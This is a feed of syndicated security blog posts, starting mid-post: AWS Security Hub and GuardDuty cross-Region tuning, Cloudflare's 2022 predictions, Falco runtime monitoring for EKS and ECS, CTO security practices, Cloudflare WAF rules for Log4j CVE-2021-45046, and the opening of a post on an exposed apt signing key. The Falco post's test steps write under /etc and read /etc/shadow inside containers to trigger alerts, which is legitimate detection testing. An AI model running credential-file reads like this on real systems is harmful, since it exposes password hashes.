Amazon GuardDuty creates findings associated with AWS IAM resources. IAM resources are global resources, which means that they are not Region-specific. If GuardDuty generates a finding for an IAM API call that is not Region-specific, such as ListGroups (for example, PenTest:IAMUser/KaliLinux) that finding is created in all GuardDuty Regions and ingested into Security Hub in every Region. You want to implement suppression rules in GuardDuty so that you don’t have multiple copies of this finding in your Security Hub delegated administrator account finding aggregation Region.

To implement AWS GuardDuty suppression rules (Console)

To reduce the duplication of findings in Security Hub, suppress global GuardDuty findings in all Regions except the Security Hub aggregation Region. For example, if you are aggregating Security Hub findings in us-east-1 and your environment uses all commercial AWS Regions in the United States, you would add a suppression rule in GuardDuty in us-east-2, us-west-1, and us-west-2.

To create AWS GuardDuty suppression rules using the AWS console:

  1. Navigate to the GuardDuty console and select the Findings link on the left side of the screen.
Figure 2. Creating GuardDuty suppression rules

Figure 2. Creating GuardDuty suppression rules

  1. Filter to search for the findings you want to suppress, and click Save / edit in the search bar.
  2. Enter a name and description for the suppression rule and save it.

To implement AWS GuardDuty suppression rules (CLI)

Alternatively, you can create AWS GuardDuty suppression rules using the CreateFilter API via CLI.

  1. Create a JSON file with your desired suppression filter criteria for the suppression rule.
  2. The following CLI command will test your filter criteria for AWS GuardDuty findings that will be suppressed:
  3. aws guardduty list-findings –detector-id 12abc34d567e8fa901bc2d34e56789f0 –finding-criteria file://criteria.json

  4. The following CLI command will create a filter for AWS GuardDuty findings that will be suppressed:
  5. aws guardduty create-filter –action ARCHIVE –detector-id 12abc34d567e8fa901bc2d34e56789f0 –name yourfiltername –finding-criteria file://criteria.json

For more details for creating AWS GuardDuty suppression rules, see Creating AWS GuardDuty suppression rules.

Reduce AWS Config cost by recording global resources in one Region

Like GuardDuty, AWS Config also records supported types of global resources, which are not tied to a specific Region and can be used in all Regions. The global resource types that AWS Config supports are IAM users, groups, roles, and customer managed policies. The configuration details for a specific global resource are the same in all Regions. If you have AWS Security Hub AWS Foundational Best Practices enabled, the feature has certain checks for global resources in AWS Config that you need to disable in all Regions except the aggregated Region.

Customize AWS Config for global resources

If you customize AWS Config in multiple Regions to record global resources, AWS Config creates multiple configuration items each time a global resource changes, one configuration item for each Region. Costs for each configuration item can be found on AWS Config pricing. These configuration items will contain identical data. To prevent duplicate configuration items, consider customizing AWS Config in only one Region to record global resources, unless you want those configuration items to be available in multiple Regions. See this blog post for a comprehensive list of additional AWS Config best practices.

To customize AWS Config for global resources (Console)

Follow the steps below to change the AWS Config global resource configuration in the AWS Console.

  1. Navigate to the AWS Config console and select Settings on the left side of the screen
  2. Click Edit in the top right corner
  3. Uncheck the Include global resources checkbox.
  4. Repeat these steps for each Region AWS Config is enabled, except the Region where you would like to track global resources.
Figure 3. AWS Config global resource setting

Figure 3. AWS Config global resource setting

To customize AWS Config for global resources (CLI)

Alternatively, you can disable the global resource tracking in AWS Config using the CLI.

aws configservice put-configuration-recorder –configuration-recorder name=default,roleARN=arn:aws:iam::123456789012:role/config-role –recording-group allSupported=true,includeGlobalResourceTypes=false

If you have deployed AWS Config using these CloudFormation templates, you would set the IncludeGlobalResourceTypes to False under the AWS::Config::ConfigurationRecorder for the Regions you do not want to track global resources, and set the value to True in the aggregated Region where you would like to use to track global resources. You can use the CloudFormation StackSets multiple AWS Region deployment feature to deploy the CloudFormation template in all AWS Regions where AWS Config is enabled.

For more details for AWS Config global resources, see Selecting AWS Config resources to record.

Disable AWS Security Hub AWS Foundational Best Practices periodic controls associated with global resources

AWS Security Hub AWS Foundational Best Practices perform checks against the resources in your AWS environment utilizing AWS Config rules. After you have disabled the AWS Config global resources in all Regions except for the Region that runs global recording, disable the Security Hub controls that deal with global resources as shown in Figure 5 below.

You can disable AWS Security Hub controls relating to global resources using the console or CLI.

To disable AWS Security Hub controls (Console)

Follow the steps below to disable Security Hub controls that deal with global resources in the AWS Console.

  1. Navigate to the Security Hub console and select Security Standards on the left side of the screen.
  2. Click on the AWS Foundation Security Best Practices v.1.0.0 security standard.
  3. Then use the filter box to search for IAM. Now you should be able to see security controls IAM.1-IAM.7, which are Security Hub global controls.
  4. Figure 4. Security Hub global controls

    Figure 4. Security Hub global controls

  5. Click on each control and select Disable in the top right corner
  6. After you have disabled resources, add a reason for disabling and choose Disable.
Figure 5. Disabling Security Hub control

Figure 5. Disabling Security Hub control

To disable AWS Security Hub controls (CLI)

Alternatively, you can disable Security Hub controls that deal with global resources using the CLI.

aws securityhub update-standards-control –standards-control-arn <control ARN> –control-status “DISABLED” –disabled-reason <description of reason to disable>

This sample CLI command disables Security Hub controls that deal with global resources:

aws securityhub update-standards-control –standards-control-arn “arn:aws:securityhub:us-east-1:123456789012:control/aws-foundational-security-best-practices/v/1.0.0/ACM.1” –control-status “DISABLED” –disabled-reason “Not applicable for my service”

You can also follow instructions to implement a solution to disable specific Security Hub controls for multiple AWS accounts.

Be sure to only disable the Security Hub controls in the Regions where global recording is also disabled. Verify the Security Hub controls associated with global resources are enabled in the same Region where AWS Config global resources are enabled.

After you have completed disabling these controls and recording of global resources, proceed to disable the [Config.1] AWS Config should be enabled control. This specific control requires recording of global resources in order to pass, which is not required to have enabled in multiple Regions.

For more details for AWS Security Hub controls, see Disabling and enabling individual AWS Security Hub controls .

Implement automatic remediation from a central Region

Once findings are consolidated and ingested into Security Hub across all your organization’s AWS accounts, you should implement auto-remediation where possible, including everything from resource misconfigurations to automated quarantine of infected EC2 instances. Security Hub provides multiple ways to achieve this through end-to-end automation with EventBridge or through human-triggered automation with Security Hub Custom Actions. You can deploy automatic remediation solutions in a single Region to perform cross-Region remediation. This helps you deploy fewer resources, saving money and operational overhead. For more information on how to enable the solution for Security Hub Automated Response and Remediation, see this blog post.

If you have automation currently in place, it’s important to understand how findings from multiple Regions triggering your automation might be affected. For example, you might have a Lambda function that remediates problems with S3 buckets, where it assumes it is being invoked in the same Region as the S3 bucket it needs to remediate. With cross-Region aggregation, your Lambda might need to make a cross-Region AWS SDK call. The Lambda function will run in the Region where the aggregation occurs, but the bucket could be in another Region, so you might have to adjust your function to handle that situation. Also, the role associated with the Lambda function could have its privileges limited to a single Region. If you intend the same function to work in all Regions, you might need change the IAM policy for the IAM role used by the Lambda. Make sure to check Service Control Policies in AWS Organizations, if you use them, because they can also deny actions in one Region while allowing them in another Region.

When enabling cross-Region finding aggregation, you’ll need to understand how any automatic remediation that might be in place today could be affected. Be sure to test your remediation functions on resources in various Regions, to be sure remediation works in all Regions you monitor.

Conclusion

This blog post highlights configurations you can take advantage of to reduce operational overhead and provide cost savings by using cross-Region finding aggregation in Security Hub. The examples given apply to the majority of AWS environments, and are meant to be action items you can use to improve the overall security and operational effectiveness of your AWS environment.

If you have feedback about this post, submit comments in the Comments section below. If you have any questions about this post, start a thread on the re:Post forum.

Want more AWS Security news? Follow us on Twitter.

Author

Marshall Jones

Marshall is a Worldwide Security Specialist Solutions Architect at AWS. His background is in AWS consulting and security architecture, focused on a variety of security domains including edge, threat detection, and compliance. Today, he is focused on helping enterprise AWS customers adopt and operationalize AWS security services to increase security effectiveness and reduce risk.

Author

Jonathan Nguyen

Jonathan is a Shared Delivery Team Senior Security Consultant at AWS. His background is in AWS Security with a focus on Threat Detection and Incident Response. Today, he helps enterprise customers develop a comprehensive AWS Security strategy, deploy security solutions at scale, and train customers on AWS Security best practices.

Looking Forward: Some Predictions for 2022

Post Syndicated from John Engates original https://blog.cloudflare.com/predictions-for-2022/

Looking Forward: Some Predictions for 2022

Looking Forward: Some Predictions for 2022

As the year comes to a close, I often reflect and make predictions about what’s to come in the next. I’ve written end-of-year predictions posts in the past, but this is my first one at Cloudflare. I joined as Field CTO in September and currently enjoy the benefit of a long history in the Internet industry with fresh eyes regarding Cloudflare. I’m excited to share a few of my thoughts as we head into the new year. Let’s go!

“Never make predictions, especially about the future.”
Casey Stengel

Adapting to a 5G world

Over the last few years, 5G networks have begun to roll out gradually worldwide. When carriers bombard us with holiday ads touting their new 5G networks, it can be hard to separate hype from reality. But 5G technology is real, and the promise for end-users is vastly more wireless bandwidth and lower network latency. Better network performance will make websites, business applications, video streaming, online games, and emerging technologies like AR/VR all perform better.

The trend of flexible work will also likely increase the adoption of 5G mobile and fixed wireless broadband. Device makers will ship countless new products with embedded 5G in the coming year. Remote workers will eagerly adopt new technology that improves Internet performance and reliability.

Companies will also invest heavily in 5G to deliver better experiences for their employees and customers. Developers will start re-architecting applications where more wireless “last mile”  bandwidth and lower wireless latency will have the most benefit. Similarly, network architects will seek solutions to improve the end-to-end performance of the entire network. In 2022, we’ll see massive investment and increased competition around 5G amongst network operators and cloud providers. Customers will gravitate to partners who can balance 5G network adoption with the most significant impact and the least cost and effort.

The talent is out there; it’s “just not evenly distributed.”

For various reasons, large numbers of workers changed jobs this year. In what has been called “the great resignation,” some claim there’s now a shortage of experienced tech workers. I’d argue that it’s more of a “great reshuffle” and consequently a race to attract and hire the best talent.

Work has changed profoundly due to the global pandemic over the last two years. People are now searching, applying, interviewing, onboarding, and working entirely remotely. Anyone looking to change jobs is likely evaluating potential employers on the working environment more than they did pre-2020.

Jobseekers are evaluating employers on different criteria than in the past. Does video conferencing work reliably? How streamlined is access to the software and tools I use every day? Can I work securely from different locations, or do the company’s security controls and VPN make it difficult to work flexibly?

Employers must make working flexibly easy and secure to attract the best talent. Even small amounts of digital friction are frustrating for workers and wasteful for employers. CIOs must take the lead and optimize the fully-digital, flexible work experience to compete for the very best talent. In 2022, I predict technology and tools will increasingly tip the balance in the talent war, and companies will look for every technological advantage to attract the talent they need.

Cloud Simply Increases

To eliminate some strain on employees, companies will search for ways to simplify their business processes and automate as much as possible. IT leaders will look for tasks they can outsource altogether. The best collaboration software and productivity tools tend to be delivered as-a-service.

It’s easy to predict more cloud adoption. But I don’t expect most companies to keep pace with how fast the cloud evolves. I was recently struck by how many services are now part of cloud provider portfolios. It isn’t easy for many companies to train employees and absorb these products fast enough. Another challenge is more cloud adoption means CEOs are often caught off guard by how much they are spending on the cloud. Lastly, there’s the risk that employee turnover means your cloud expertise sometimes walks out the door.

I predict companies will continue to adopt the cloud quickly, but IT leaders will expect cloud services to simplify instead of adding more complexity. Companies need the cloud to solve problems, not just provide the building blocks. IT leaders will ask for more bang for the buck and squeeze more value from their cloud partners to keep costs under control.

I also look forward to CIOs putting pressure on cloud providers to play nice with others and stop holding companies hostage. We believe egregious egress charges are a barrier to cloud adoption, and eliminating them would remove much of the cost and frustration associated with integrating services and leveraging multiple clouds.

“Everything should be made as simple as possible, but not simpler.”
Albert Einstein

Security is only getting more complicated. Companies must embrace zero trust

Throughout 2021, Cloudflare observed a steady rise in bot traffic and ever-larger DDoS attacks. As an industry, we’ve seen the trends of more phishing attempts and high-profile ransomware attacks. The recent emergence of the Log4j vulnerability has reminded us that security doesn’t take a holiday.

Given the current threat landscape, how do we protect our companies? Can we stop blaming users for clicking phishing emails? How do we isolate bad actors if they happen to find a new zero-day exploit like Log4j?

The only trend I see that brings me hope is zero trust. It’s been on the radar for a few years, and some companies have implemented point-products that are called zero trust. But zero trust isn’t a product or industry buzzword. Zero trust is an overarching security philosophy. In my opinion, far too few companies have embraced zero trust as such.

In 2022, CIOs and CISOs will increasingly evaluate (or reevaluate) technologies and practices in their security toolkit through the lens of zero trust. It should not matter how invested IT leaders are in existing security technology. Everything should be scrutinized, from managing networks and deploying firewalls to authenticating users and securing access to applications. If it doesn’t fit in the context of zero trust, IT managers should probably replace it.

The security-as-a-service model will tend to win for the same reasons I predicted more cloud. Namely, solving security problems as simply as possible with the fewest headcount required.

The corporate network (WAN) is dead. Long live the (Internet-based) corporate network

I can’t pinpoint the official time of death of the corporate WAN, but it was sometime between the advent of fiber-to-the-home and 5G wireless broadband. The corporate network has long suffered from high costs and inflexibility. SD-WAN was the prescription that extended the corporate network’s life, but work-from-home made the corporate network an anachronism.

Video conferencing and SaaS apps now run better at home than at the office for many of us. And the broader rollout of 5G will make things even better for mobile users. Your old VPN will soon disappear too. Shutting down the legacy VPN should be a badge of honor for the CISO. It’s a sign that the company has replaced the castle-and-moat perimeter firewall architecture and is embracing the zero trust security model.

In 2022 and beyond, the Internet will become the only network that matters for most users and companies. SaaS adoption and continued flexible work arrangements will lead companies to give up the idea of the traditional corporate network. IT leaders will likely cut budgets for existing WAN infrastructure to invest in more effective end-user productivity.

Matters of Privacy

Social media whistleblowers, end-to-end encryption, and mobile device privacy were on the minds of consumers in 2021. Consumers want to know whom they’re buying from and sharing data with, are they trustworthy, and what these companies do with the collected data?

Data privacy for businesses is critical to get right due to the scope of the privacy issues at hand. Historically, as some digital enterprises grew, there was a race to collect as much data as possible about their users and use it to generate revenue. The EU Global Data Protection Regulation (GDPR) has turned that around and forced companies to reevaluate their data collection practices. It has put power back into the hands of users and consumers.

GDPR is just one set of rules regulating the use of data about citizens. The US, EU, China, Russia, India, and Brazil have different views and regulations on privacy. Data privacy rules will not evolve the same everywhere, and it will be increasingly difficult for companies to navigate the patchwork of regulations around the globe.

Just as security is now a part of every software delivery stage, privacy needs to be considered throughout the development process. I predict that in 2022 and beyond, companies will architect applications with privacy laws in mind from the outset. About a year ago, we announced Cloudflare Data Localization Suite, which helps businesses take advantage of our global network’s performance and security benefits while making it easy to set rules to control where their data is handled automatically.

Another trend that spans the domains of privacy, security, and remote work is user preference for a single device for both personal and work-related activities. Carrying two or more devices is a hassle, but maintaining privacy and security on an unmanaged device presents challenges for IT. We will move away from the traditional tightly controlled, IT-managed device with time. Browser isolation and the evolution of zero trust security controls will get us closer to this holy grail of end-user device independence.

Conclusion

We have much to be thankful for, even with the challenges we’ve all faced in 2021. 2022 may well be as challenging as this year has been, but I predict it will be a great year, nonetheless. We’ll work hard, learn from our mistakes, and ultimately adapt to whatever life and work throw at us. At least that’s my plan for next year!

Continuous runtime security monitoring with AWS Security Hub and Falco

Post Syndicated from Rajarshi Das original https://aws.amazon.com/blogs/security/continuous-runtime-security-monitoring-with-aws-security-hub-and-falco/

Customers want a single and comprehensive view of the security posture of their workloads. Runtime security event monitoring is important to building secure, operationally excellent, and reliable workloads, especially in environments that run containers and container orchestration platforms. In this blog post, we show you how to use services such as AWS Security Hub and Falco, a Cloud Native Computing Foundation project, to build a continuous runtime security monitoring solution.

With the solution in place, you can collect runtime security findings from multiple AWS accounts running one or more workloads on AWS container orchestration platforms, such as Amazon Elastic Kubernetes Service (Amazon EKS) or Amazon Elastic Container Service (Amazon ECS). The solution collates the findings across those accounts into a designated account where you can view the security posture across accounts and workloads.

 

Solution overview

Security Hub collects security findings from other AWS services using a standardized AWS Security Findings Format (ASFF). Falco provides the ability to detect security events at runtime for containers. Partner integrations like Falco are also available on Security Hub and use ASFF. Security Hub provides a custom integrations feature using ASFF to enable collection and aggregation of findings that are generated by custom security products.

The solution in this blog post uses AWS FireLens, Amazon CloudWatch Logs, and AWS Lambda to enrich logs from Falco and populate Security Hub.

Figure : Architecture diagram of continuous runtime security monitoring

Figure 1: Architecture diagram of continuous runtime security monitoring

Here’s how the solution works, as shown in Figure 1:

  1. An AWS account is running a workload on Amazon EKS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch logs using AWS FireLens.
    2. CloudWatch logs act as the source for FireLens and a trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon EKS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as a member account for Security Hub.
  2. Another AWS account is running a workload on Amazon ECS.
    1. Runtime security events detected by Falco for that workload are sent to CloudWatch logs using AWS FireLens.
    2. CloudWatch logs acts as the source for FireLens and a trigger for the Lambda function in the next step.
    3. The Lambda function transforms the logs into the ASFF. These findings can now be imported into Security Hub.
    4. The Security Hub instance that is running in the same account as the workload running on Amazon ECS stores and processes the findings provided by Lambda and provides the security posture to users of the account. This instance also acts as another member account for Security Hub.
  3. The designated Security Hub administrator account combines the findings generated by the two member accounts, and then provides a comprehensive view of security alerts and security posture across AWS accounts. If your workloads span multiple regions, Security Hub supports aggregating findings across Regions.

 

Prerequisites

For this walkthrough, you should have the following in place:

  1. Three AWS accounts.

    Note: We recommend three accounts so you can experience Security Hub’s support for a multi-account setup. However, you can use a single AWS account instead to host the Amazon ECS and Amazon EKS workloads, and send findings to Security Hub in the same account. If you are using a single account, skip the following account specific-guidance. If you are integrated with AWS Organizations, the designated Security Hub administrator account will automatically have access to the member accounts.

  2. Security Hub set up with an administrator account on one account.
  3. Security Hub set up with member accounts on two accounts: one account to host the Amazon EKS workload, and one account to host the Amazon ECS workload.
  4. Falco set up on the Amazon EKS and Amazon ECS clusters, with logs routed to CloudWatch Logs using FireLens. For instructions on how to do this, see:

    Important: Take note of the names of the CloudWatch Logs groups, as you will need them in the next section.

  5. AWS Cloud Development Kit (CDK) installed on the member accounts to deploy the solution that provides the custom integration between Falco and Security Hub.

 

Deploying the solution

In this section, you will learn how to deploy the solution and enable the CloudWatch Logs group. Enabling the CloudWatch Logs group is the trigger for running the Lambda function in both member accounts.

To deploy this solution in your own account

  1. Clone the aws-securityhub-falco-ecs-eks-integration GitHub repository by running the following command.
    $git clone https://github.com/aws-samples/aws-securityhub-falco-ecs-eks-integration
  2. Follow the instructions in the README file provided on GitHub to build and deploy the solution. Make sure that you deploy the solution to the accounts hosting the Amazon EKS and Amazon ECS clusters.
  3. Navigate to the AWS Lambda console and confirm that you see the newly created Lambda function. You will use this function in the next section.
Figure : Lambda function for Falco integration with Security Hub

Figure 2: Lambda function for Falco integration with Security Hub

To enable the CloudWatch Logs group

  1. In the AWS Management Console, select the Lambda function shown in Figure 2—AwsSecurityhubFalcoEcsEksln-lambdafunction—and then, on the Function overview screen, select + Add trigger.
  2. On the Add trigger screen, provide the following information and then select Add, as shown in Figure 3.
    • Trigger configuration – From the drop-down, select CloudWatch logs.
    • Log group – Choose the Log group you noted in Step 4 of the Prerequisites. In our setup, the log group for the Amazon ECS and Amazon EKS clusters, deployed in separate AWS accounts, was set with the same value (falco).
    • Filter name – Provide a name for the filter. In our example, we used the name falco.
    • Filter pattern – optional – Leave this field blank.
    Figure 3: Lambda function trigger - CloudWatch Log group

    Figure 3: Lambda function trigger – CloudWatch Log group

  3. Repeat these steps (as applicable) to set up the trigger for the Lambda function deployed in other accounts.

 

Testing the deployment

Now that you’ve deployed the solution, you will verify that it’s working.

With the default rules, Falco generates alerts for activities such as:

  • An attempt to write to a file below the /etc folder. The /etc folder contains important system configuration files.
  • An attempt to open a sensitive file (such as /etc/shadow) for reading.

To test your deployment, you will attempt to perform these activities to generate Falco alerts that are reported as Security Hub findings in the same account. Then you will review the findings.

To test the deployment in member account 1

  1. Run the following commands to trigger an alert in member account 1, which is running an Amazon EKS cluster. Replace <container_name> with your own value.
    kubectl exec -it <container_name> /bin/bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. To see the list of findings, log in to your Security Hub admin account and navigate to Security Hub > Findings. As shown in Figure 4, you will see the alerts generated by Falco, including the Falco-generated title, and the instance where the alert was triggered.

    Figure 4: Findings in Security Hub

    Figure 4: Findings in Security Hub

  3. To see more detail about a finding, check the box next to the finding. Figure 5 shows some of the details for the finding Read sensitive file untrusted.
    Figure 5: Sensitive file read finding - detail view

    Figure 5: Sensitive file read finding – detail view

    Figure 6 shows the Resources section of this finding, that includes the instance ID of the Amazon EKS cluster node. In our example this is the Amazon Elastic Compute Cloud (Amazon EC2) instance.

    Figure 6: Resource Detail in Security Hub finding

To test the deployment in member account 2

  1. Run the following commands to trigger a Falco alert in member account 2, which is running an Amazon ECS cluster. Replace <<container_id> with your own value.
    docker exec -it <container_id> bash
    touch /etc/5
    cat /etc/shadow > /dev/null
  2. As in the preceding example with member account 1, to view the findings related to this alert, navigate to your Security Hub admin account and select Findings.

To view the collated findings from both member accounts in Security Hub

  1. In the designated Security Hub administrator account, navigate to Security Hub > Findings. The findings from both member accounts are collated in the designated Security Hub administrator account. You can use this centralized account to view the security posture across accounts and workloads. Figure 7 shows two findings, one from each member account, viewable in the Single Pane of Glass administrator account.

    Figure 7: Write below /etc findings in a single view

    Figure 7: Write below /etc findings in a single view

  2. To see more information and a link to the corresponding member account where the finding was generated, check the box next to the finding. Figure 8 shows the account detail associated with a specific finding in member account 1.
    Figure 8: Write under /etc detail view in Security Hub admin account

    Figure 8: Write under /etc detail view in Security Hub admin account

    By centralizing and enriching the findings from Falco, you can take action more quickly or perform automated remediation on the impacted resources.

 

Cleaning up

To clean up this demo:

  1. Delete the CloudWatch Logs trigger from the Lambda functions that were created in the section To enable the CloudWatch Logs group.
  2. Delete the Lambda functions by deleting the CloudFormation stack, created in the section To deploy this solution in your own account.
  3. Delete the Amazon EKS and Amazon ECS clusters created as part of the Prerequisites.

 

Conclusion

In this post, you learned how to achieve multi-account continuous runtime security monitoring for container-based workloads running on Amazon EKS and Amazon ECS. This is achieved by creating a custom integration between Falco and Security Hub.

You can extend this solution in a number of ways. For example:

  • You can forward findings across accounts using a single source to security information and event management (SIEM) tools such as Splunk.
  • You can perform automated remediation activities based on the findings generated, using Lambda.

To learn more about managing a centralized Security Hub administrator account, see Managing administrator and member accounts. To learn more about working with ASFF, see AWS Security Finding Format (ASFF) in the documentation. To learn more about the Falco engine and rule structure, see the Falco documentation.

If you have feedback about this post, submit comments in the Comments section below.

Want more AWS Security news? Follow us on Twitter.

Rajarshi Das

Rajarshi Das

Rajarshi is a Solutions Architect at Amazon Web Services. He focuses on helping Public Sector customers accelerate their security and compliance certifications and authorizations by architecting secure and scalable solutions. Rajarshi holds 4 AWS certifications including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialist.

Author

Adam Cerini

Adam is a Senior Solutions Architect with Amazon Web Services. He focuses on helping Public Sector customers architect scalable, secure, and cost effective systems. Adam holds 5 AWS certifications including AWS Certified Solutions Architect – Professional and AWS Certified Security – Specialist.

Insights for CTOs: Part 2 – Enable Good Decisions at Scale with Robust Security

Post Syndicated from Syed Jaffry original https://aws.amazon.com/blogs/architecture/insights-for-ctos-part-2-enable-good-decisions-at-scale-with-robust-security/

In my role as a Senior Solutions Architect, I have spoken to chief technology officers (CTOs) and executive leadership of large enterprises like big banks, software as a service (SaaS) businesses, mid-sized enterprises, and startups.

In this 6-part series, I share insights gained from various CTOs during their cloud adoption journeys at their respective organizations. I have taken these lessons and summarized architecture best practices to help you build and operate applications successfully in the cloud. This series will also cover topics on building and operating cloud applications, security, cloud financial management, modern data and artificial intelligence (AI), cloud operating models, and strategies for cloud migration.

In part 2, my colleague Paul Hawkins and I will show you how to effectively communicate organization-wide security processes. This will ensure you can make informed decisions to scale effectively. We also describe how to establish robust security controls using best practices from the Security Pillar of the Well-Architected Framework.

Effectively establish and communicate security processes

To ensure your employees, customers, contractors, etc., understand your organization’s security goals, make sure that people know the what, how, and why behind your security objectives:

  • What are the overall objectives they need to meet?
  • How do you intend for the organization and your customers to work together to meet these goals?
  • Why are meeting these goals important to your organization and customers?

Having well communicated security principles gives a common understanding of overall objectives. Once you communicate these goals, you can get more specific in terms of how those objectives can be achieved.

The next sections discuss best practices to establish your organization’s security processes.

Create a “path to production” process

A “path to production” process is a set of consistent and reusable engineering standards and steps that each new cloud workload must adhere to prior to production deployment. Using this process will increase delivery velocity while reducing business risk by ensuring strong compliance to standards.

Classify your data for better access control

Understanding the type of data that you are handling and where it is being handled is critical to understanding what you need to do to appropriately protect it. For example, the requirements for a public website are different than a payment processing workload. By knowing where and when sensitive data is being accessed or used, you can more easily assess and establish the appropriate controls.

Figure 1 shows a scale that will help you determine when and how to protect sensitive data. It shows that you would apply stricter access controls for more sensitive data to reduce the risk of inappropriate access. Detective controls allow you to audit and respond to unexpected access.

By simplifying the baseline control posture across all environments and layering on stricter controls where appropriate, you will make it easier to deliver change more swiftly while maintaining the right level of security.

Data classification and control scale

Figure 1. Data classification and control scale

Identify and prioritize how to address risks using a threat model

As shown in the How to approach threat modeling blog post, threat modeling helps workload teams identify potential threats and develop or implement security controls to address those threats.

Threat modeling is most effective when it’s done at the workload (or workload feature) level. We recommend creating reusable threat modeling templates. This will help ensure quicker time to production and a consistent security control posture for your systems.

Create feedback cycles

Security, like other areas of architecture and design, is not static. You don’t implement security processes and walk away, just like you wouldn’t ship an application and never improve its availability, performance, or ease of operation.

Implementation of feedback cycles will vary depending on your organizational structure and processes. However, one common way we have seen feedback cycles being implemented is with a collaborative, blame-free root cause analysis (RCA) process. It allows you to understand how many issues you have been able to prevent or effectively respond to and apply that knowledge to make your systems more secure. It also demonstrates organizational support for an objective discussion where people are not penalized for asking questions.

Security controls

Protect your applications and infrastructure

To secure your organization, build automation that delivers robust answers to the following questions:

  1. Preventative controls – how well can you block unauthorized access?
  2. Detective controls – how well can you identify unexpected activity or unwanted configuration?
  3. Incident response – how quickly and effectively can you respond and recover from issues?
  4. Data protection – how well is the data protected while being used and stored?

Preventative controls

Start with robust identity and access management (IAM). For human access, avoid having to maintain separate credentials between cloud and on-premises systems. It does not scale and creates threat vectors such as long-lived credentials and credential leaks.

Instead, use federated authentication within a centralized system for provisioning and deprovisioning organization-wide access to all your systems, including the cloud. For AWS access, you can do this with AWS Single Sign-On (AWS SSO), direct federation to IAM, or integration with partner solutions, such as Okta or Active Directory.

Enhance your trust boundary with the principles of “zero trust.” Traditionally, organizations tend to rely on the network as the primary point of control. This can create a “hard shell, soft core” model, which doesn’t consider context for access decisions. Zero trust is about increasing your use of identity as a means to grant access in addition to traditional controls that rely on network being private.

Apply “defense in depth” to your application infrastructure with a layered security architecture. The sequence in which you layer the controls together can depend on your use case. For example, you can apply IAM controls either at the database layer or at the start of user activity—or both. Figure 2 shows a conceptual view of layering controls to help secure access to your data. Figure 3 shows the implementation view for a web-facing application.

Defense in depth

Figure 2. Defense in depth

Defense in depth applied to a web application

Figure 3. Defense in depth applied to a web application

Detective controls

Detective controls allow you to get the information you need to respond to unexpected changes and incidents. Tools like Amazon GuardDuty and AWS Config can integrate with your security information and event monitoring (SIEM) system so you can respond to incidents using human and automated intervention.

Incident response

When security incidents are detected, timely and appropriate response is critical to minimize business impact. A robust incident response process is a combination of human intervention steps and automation. The AWS Security Hub Automated Response and Remediation solution provides an example of how you can build incident response automation.

Protect data with robust controls

Restrict access to your databases with private networking and strong identity and access control. Apply data encryption in transit (TLS) and at rest. A common mistake that organizations make is not enabling encryption at rest in databases at the time of initial deployment.

It is difficult to enable database encryption after the fact without time-consuming data migration. Therefore, enable database encryption from the start and minimize direct human access to data by applying principles of least privilege. This reduces the likelihood of accidental disclosure of information or misconfiguration of systems.

Ready to get started?

As a CTO, understanding the overall posture of your security processes against the foundational security controls is beneficial. Tracking key metrics on the effectiveness of the decision-making process, overall security objectives, and the improvement in posture over time should be regularly evaluated by the CTO and CISO organizations.

Embedding the principles of robust security processes and controls into the way your organization designs, develops, and operates workloads makes it easier to consistently make good decisions quickly.

To get started, look at workloads where engineering and security are already working together or bootstrap an initiative for this. Use the Well Architected Tool’s Security Pillar to create and communicate a set of objectives that demonstrate value.

Other blogs in this series

Looking for more architecture content? AWS Architecture Center provides reference architecture diagrams, vetted architecture solutions, Well-Architected best practices, patterns, icons, and more!

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Post Syndicated from Gabriel Gabor original https://blog.cloudflare.com/protection-against-cve-2021-45046-the-additional-log4j-rce-vulnerability/

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Protection against CVE-2021-45046, the additional Log4j RCE vulnerability

Hot on the heels of CVE-2021-44228 a second Log4J CVE has been filed CVE-2021-45046. The rules that we previously released for CVE-2021-44228 give the same level of protection for this new CVE.

This vulnerability is actively being exploited and anyone using Log4J should update to version 2.16.0 as soon as possible, even if you have previously updated to 2.15.0. The latest version can be found on the Log4J download page.

Customers using the Cloudflare WAF have three rules to help mitigate any exploit attempts:

Rule ID Description Default Action
100514 (legacy WAF)
6b1cc72dff9746469d4695a474430f12 (new WAF)
Log4J Headers BLOCK
100515 (legacy WAF)
0c054d4e4dd5455c9ff8f01efe5abb10 (new WAF)
Log4J Body BLOCK
100516 (legacy WAF)
5f6744fa026a4638bda5b3d7d5e015dd (new WAF)
Log4J URL BLOCK

The mitigation has been split across three rules inspecting HTTP headers, body and URL respectively.

In addition to the above rules we have also released a fourth rule that will protect against a much wider range of attacks at the cost of a higher false positive rate. For that reason we have made it available but not set it to BLOCK by default:

Rule ID Description Default Action
100517 (legacy WAF)
2c5413e155db4365befe0df160ba67d7 (new WAF)
Log4J Advanced URI, Headers DISABLED

Who is affected

Log4J is a powerful Java-based logging library maintained by the Apache Software Foundation.

In all Log4J versions >= 2.0-beta9 and <= 2.14.1 JNDI features used in configuration, log messages, and parameters can be exploited by an attacker to perform remote code execution. Specifically, an attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

In addition, the previous mitigations for CVE-2021-22448 as seen in version 2.15.0 were not adequate to protect against CVE-2021-45046.

An exposed apt signing key and how to improve apt security

Post Syndicated from Jeff Hiner original https://blog.cloudflare.com/dont-use-apt-key/

An exposed apt signing key and how to improve apt security

An exposed apt signing key and how to improve apt security

Recently, we received a bug bounty report regarding the GPG signing key used for pkg.cloudflareclient.com, the Linux package repository for our Cloudflare WARP products. The report stated that this private key had been exposed. We’ve since rotated this key and we are taking steps to ensure a similar problem can’t happen again. Before you read on, if you are a Linux user of Cloudflare WARP, please follow these instructions to rotate the Cloudflare GPG Public Key trusted by your package manager. This only affects WARP users who have installed WARP on Linux. It does not affect Cloudflare customers of any of our other products or WARP users on mobile devices.

But we also realized that the impact of an improperly secured private key can have consequences that extend beyond the scope of one third-party repository. The remainder of this blog shows how to improve the security of apt with third-party repositories.

The unexpected impact

